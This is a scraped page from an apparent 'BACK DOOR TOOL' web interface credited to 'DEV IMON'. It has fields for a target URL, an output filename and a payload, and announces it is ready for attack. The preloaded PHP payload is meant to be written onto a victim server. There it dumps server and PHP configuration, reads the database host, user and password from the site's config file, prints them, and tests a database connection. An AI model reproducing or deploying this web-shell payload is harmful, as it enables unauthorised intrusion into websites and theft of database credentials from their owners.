BACK DOOR TOOL
Weird Guy Emon | DEV TʜɪʀD EYE |
Back
CONNECTED
DEV IMON HERE
Logout
BACKXDOOR TOOL BY |DEV IMON|
[SYSTEM]
BACK DOOR TOOL READY FOR ATTACK
>
Target URL
>
Output Filename
>
Payload Content
<?php // ===== SERVER INFO DISPLAY FUNCTION ===== function display_server_info() { echo "<div style=\" background:#1e1e1e; color:#d4d4d4; font-family:monospace; padding:15px; border-radius:5px; line-height:1.5em; max-height:500px; overflow:auto; white-space:pre-wrap; \">"; echo "===== SERVER INFORMATION =====\n"; echo "PHP Version : " . phpversion() . "\n"; echo "Server Software : " . ($_SERVER["SERVER_SOFTWARE"] ?? "N/A") . "\n"; echo "Server Name : " . ($_SERVER["SERVER_NAME"] ?? "N/A") . "\n"; echo "Server Address : " . ($_SERVER["SERVER_ADDR"] ?? "N/A") . "\n"; echo "Server Port : " . ($_SERVER["SERVER_PORT"] ?? "N/A") . "\n"; echo "Document Root : " . ($_SERVER["DOCUMENT_ROOT"] ?? "N/A") . "\n"; echo "Current File : " . __FILE__ . "\n"; echo "Request Method : " . $_SERVER["REQUEST_METHOD"] . "\n"; echo "User Agent : " . ($_SERVER["HTTP_USER_AGENT"] ?? "N/A") . "\n"; echo "Remote IP : " . ($_SERVER["REMOTE_ADDR"] ?? "N/A") . "\n\n"; echo "===== PHP CONFIGURATION =====\n"; echo "Loaded php.ini : " . php_ini_loaded_file() . "\n"; echo "Memory Limit : " . ini_get("memory_limit") . "\n"; echo "Max Execution Time : " . ini_get("max_execution_time") . " sec\n"; echo "Upload Max Filesize : " . ini_get("upload_max_filesize") . "\n"; echo "Post Max Size : " . ini_get("post_max_size") . "\n"; echo "Display Errors : " . ini_get("display_errors") . "\n"; echo "Error Reporting Level : " . error_reporting() . "\n\n"; echo "===== DATABASE INFO =====\n"; // Include config.php from /app folder in Document Root $config_path = $_SERVER["DOCUMENT_ROOT"] . "/app/config.php"; if(file_exists($config_path)) { $config = include $config_path; $db_host = $config["db"]["host"] ?? "localhost"; $db_user = $config["db"]["user"] ?? ""; $db_pass = $config["db"]["pass"] ?? ""; $db_name = $config["db"]["name"] ?? ""; echo "DB Host : $db_host\n"; echo "DB Name : $db_name\n"; echo "DB User : $db_user\n"; echo "DB Pass : $db_pass\n"; // Try connecting to database $mysqli = @new mysqli($db_host, $db_user, $db_pass, $db_name); if ($mysqli->connect_error) { echo "DB Connection : Failed (" . $mysqli->connect_error . ")\n"; } else { echo "DB Connection : Successful\n"; echo "DB Server Version : " . $mysqli->server_info . "\n"; } } else { echo "Config file not found at $config_path\n"; } echo "</div>"; } // Execute the function display_server_info(); ?>
Execute
Clear
Server Response
Copy
[STATUS]
Awaiting command execution